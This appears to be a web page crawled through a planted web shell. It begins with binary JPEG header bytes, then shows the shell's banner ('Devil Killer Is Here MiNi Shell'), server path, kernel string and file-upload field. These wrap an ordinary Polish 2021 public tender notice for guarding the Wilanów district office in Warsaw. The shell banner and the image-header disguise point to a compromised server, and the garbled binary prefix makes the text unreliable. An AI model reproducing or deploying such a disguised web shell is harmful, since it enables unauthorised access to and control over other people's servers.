JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20210805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20210805/0013864501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00138645 z dnia 2021-08-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona osób i mienia obiektów Urzędu Dzielnicy Wilanów m.st. Warszawy przy ul. F. Klimczaka 2 i 4 w Warszawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dzielnica Wilanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Franciszka Klimczaka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wilanow.zzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wilanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona osób i mienia obiektów Urzędu Dzielnicy Wilanów m.st. Warszawy przy ul. F. Klimczaka 2 i 4 w Warszawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0ea59983-f5c8-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00138645</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000252/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Ochrona osób i mienia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Z uwagi na specyfikę przedmiotu zamówienia, Zamawiający zastrzega - Tabelę służby. Dokument dostępny jest w siedzibie Zamawiającego przy ul. F. Klimczaka 2 w Warszawie. Zamawiający udostępni dokumentację na wniosek Wykonawcy złożony w Systemie (Zamawiający korzysta z platformy Marketplanet OnePlace, zwanej „platformą zakupową Zamawiającego” lub „Systemem”).<br/>W ramach sprawdzenia dokumentów Zamawiający udostępni Informacje dotyczące zasad pełnienia służby, w tym rozmieszczenie poszczególnych pracowników ochrony, zasady interwencji, użyte zabezpieczenia techniczne w poszczególnych obiektach, które nie zostaną opublikowane na stronie Zamawiającego ze względu na kluczowe znaczenie dla bezpieczeństwa<br/>obiektów. Wykonawca zobowiązuje się do utrzymania w tajemnicy i nieujawniania osobom<br/>trzecim oraz niewykorzystywania w innych celach pozyskanych informacji w związku z<br/>uczestnictwem w postępowaniu. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo-aplikacyjne do przekazania danych dotyczące systemu<br/>https://zamowienia.um.warszawa.pl:<br/>• stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google<br/>Chrome lub MS Edge;<br/>• włączona obsługa JavaScript;<br/>• zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf<br/>Format kodowania i oznaczania czasu:<br/>• plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert;<br/>• oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem<br/>Głównego Urzędu Miar.<br/>Wymagania sprzętowo-aplikacyjne w zakresie podpisywania ofert:<br/>W przypadku składania oferty w formie elektronicznej (podpisywania dokumentów kwalifikowanym<br/>podpisem elektronicznym), Wykonawca musi posiadać:<br/>• Kwalifikowany podpis elektroniczny osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce obsługa JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE - <br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host<br/>• Podłączony lub wbudowany w komputer czytnik kart podpisu elektronicznego. Prawidłowość<br/>zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace, po kliknięciu<br/>przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów podpisem<br/>osobistym), wykonawca musi posiadać:<br/>• E-dowód osobisty osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce opcja obsługi JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host;<br/>• Zainstalowane oprogramowanie do obsługi e-dowodu E-dowód menadżer dostępne na stronie<br/>https://www.gov.pl/web/e-dowod;<br/>• Podłączony lub wbudowany w komputer czytnik karty e-dowód.<br/>Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace,<br/>po kliknięciu przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów profilem zaufanym),<br/>wykonawca musi posiadać:<br/>• Profil zaufany osoby składającej ofertę w Systemie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż: - Zamawiający udostępnia<br/>dane osobowe, o których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm.<br/>3) ),zwanego dalej „rozporządzeniem 2016/679”, w celu umożliwienia korzystania ze środków<br/>ochrony prawnej, o których mowa w dziale IX ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, do upływu terminu do ich wniesienia.- Skorzystanie przez osobę, której dane osobowe<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art.<br/>16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z ustawą.- W postępowaniu o udzielenie zamówienia zgłoszenie żądania<br/>ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">24/WAG/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/>1.	bezpośrednia, całodobowa ochrona fizyczna osób i mienia znajdujących się <br/>w obiektach administrowanych przez Urząd Dzielnicy Wilanów m.st. Warszawy, wskazanych w Załączniku nr 1 do Umowy, zwanych dalej „Obiektami”, zgodnie z ustawą z 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. z 2020 r. poz. 838.), w ilości 29440 roboczogodzin, w tym 400 roboczogodzin w ramach opcji.<br/>2.	monitorowanie sygnałów alarmowych informujących o napadzie, włamaniu z obiektów wymienionych w Załączniku nr 1 do Umowy;<br/>3.	przyjazd Grupy Interwencyjnej w przypadku wywołania alarmu lub jej przywołania,<br/>4.	sporządzeniu dla każdego Obiektu „Instrukcji Ochrony Obiektu” uwzględniającej specyfikę wykonywanej działalności Zamawiającego;<br/>5.	opracowaniu procedury działania Grupy Interwencyjnej uwzględniającej specyfikę i położenie Obiektów;<br/>6.	sporządzeniu analizy ryzyka związanej z zapewnieniem ciągłości ochrony osób i mienia w sytuacji wystąpienia w powołanym Zespole choroby COVID-19 lub innego tego typu zagrożenia epidemiologicznego.<br/>Do realizacji zamówienia Wykonawcy muszą potwierdzić, że:<br/>•	dysponują zmotoryzowaną i wyposażoną w środki przymusu bezpośredniego oraz łączności bezprzewodowej zewnętrznej i wewnętrznej Grupą Interwencyjną,<br/>•	dysponują 18 pracownikami ochrony wpisanymi na listę kwalifikowanych pracowników ochrony, w tym minimum czterech z 18 pracowników musi posiadać dodatkowo status kwalifikowanych pracowników zabezpieczenia technicznego zgodnie z ustawą z 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz.U. z 2020 r. poz. 838.) oraz minimum 10 pracowników musi posiadać zaświadczenie ukończenia szkolenia z obsługi centrali przeciwpożarowej (ostateczna liczba według złożonej oferty nie mniej niż 10) przeprowadzonego przez inspektora ds. ochrony przeciwpożarowej zgodnie z ustawą z dnia 24 sierpnia 1991 r. o ochronie przeciwpożarowej, a wszyscy posiadają umiejętność obsługi komputera oraz pakietu Office w stopniu podstawowym.<br/>Termin wykonywania zamówienia: 329 dni od dnia zawarcia umowy, jednak nie wcześniej niż od dnia 26.09.2021 r. od godz. 12:00. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji z art. 441 ustawy. <br/>Zamawiający w ramach realizacji przedmiotu zamówienia wprowadza prawo opcji, zgodnie z którym w okresie obowiązywania umowy może zlecić wykonanie zadania polegającego na świadczeniu usług ochrony osób i mienia przez dodatkowych pracowników w dodatkowych godzinach w obiektach Zamawiającego wymienionych w zał. nr 1 do umowy. W ramach opcji: <br/>1)	Wykonawca zobowiązany jest ten przedmiot zamówienia wykonać za cenę ostateczną wskazaną w postępowaniu. Maksymalna ilość roboczogodzin objętych prawem opcji określona została na 400 rbh z 29440.<br/>2)	Łączna wartość zamówienia wynikająca z prawa opcji wraz z zamówieniem podstawowym nie może przekroczyć kwoty przeznaczonej na sfinansowanie zamówienia, która zostanie odczytana podczas otwarcia ofert.<br/>3)	Prawo opcji będzie uruchomione na podstawie pisma przekazanego Wykonawcy na adres wskazany w umowie i zostanie uruchomione najpóźniej 48 godzin przed koniecznością skorzystania z usług dodatkowej ochrony. W piśmie zostanie określony termin dodatkowej ochrony z podaniem ilości koniecznych pracowników i roboczogodzin objętych danym zdarzeniem. Skorzystanie z prawa opcji jest uzależnione od nieplanowanej sytuacji, która może się przydarzyć Zamawiającemu i wymagać będzie zwiększenia poziomu ochrony. Skorzystanie z prawa opcji jest możliwe wielokrotnie do wykorzystania maksymalnej puli łącznie 400 roboczogodzin w trakcie trwania umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">329 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">84</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba pracowników posiadających szkolenie przeciwpożarowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na potwierdzenie spełnienia warunków udziału Wykonawca wykaże, że posiada:<br/>a. aktualną koncesję wydaną przez ministra właściwego do spraw wewnętrznych na<br/>prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia w formie<br/>bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze<br/>sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i<br/>systemach alarmowych<br/>b. doświadczenie, w szczególności w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, a<br/>w przypadku świadczeń okresowych lub ciągłych wykonuje należycie, przynajmniej 2 usługi<br/>ochrony fizycznej obiektów użyteczności publicznej, o wartości co najmniej 1 000.000,00 zł<br/>(słownie: jeden milion złotych 00/100) brutto każda z usług.<br/>Na potrzeby przedmiotowego postępowania Zamawiający przyjmuje, że budynek użyteczności<br/>publicznej to obiekt przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości,<br/>kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej,<br/>społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych<br/>lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym,<br/>drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do<br/>wykonywania podobnych funkcji. Jednocześnie zastrzeżono, że za budynek użyteczności<br/>publicznej uznaje się także budynek biurowy lub socjalny. O zaliczeniu danego obiektu do<br/>kategorii użyteczności publicznej decyduje w pierwszej kolejności zaspokajanie zbiorowych i<br/>powszechnych, a nie indywidualnych lub grupowych potrzeb społecznych.<br/>W przypadku podania w dokumentach złożonych na potwierdzenie spełniania warunków udziału<br/>w postępowaniu kwot w walutach obcych, Zamawiający do przeliczenia na PLN przyjmie średni<br/>kurs Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia o zamówieniu. Jeżeli<br/>w dniu opublikowania ogłoszenia o zamówieniu NBP nie opublikuje informacji o średnim kursie<br/>walut, należy dokonać odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego<br/>dnia, w którym NBP opublikuje ww. informacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. potwierdzenie aktualności informacji zawartych w oświadczeniu, o którym mowa w III.C.1.2)a) SWZ<br/>w zakresie podstaw wykluczenia z postępowania z art. 108 ust. 1, wskazanych przez Zamawiającego -<br/>wg wzoru stanowiącego Załącznik nr 6 do SWZ,<br/>W przypadku podmiotów występujących wspólnie dokument składa każdy wykonawca. W przypadku<br/>Wykonawcy, który powołuje się na zasoby innych podmiotów w celu wykazania braku istnienia wobec<br/>nich podstaw wykluczenia, wymóg złożenia niniejszego oświadczenia dotyczy każdego z podmiotów.<br/>2. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>3. zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający, że wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. odpowiednie zezwolenie, licencja, koncesja lub potwierdzenie wpisu do<br/>rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych<br/>usług w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania t.j - aktualna koncesja<br/>wydana przez ministra właściwego do spraw wewnętrznych na prowadzenie działalności gospodarczej<br/>w zakresie ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz<br/>polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w<br/>elektronicznych urządzeniach i systemach alarmowych<br/>2. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych 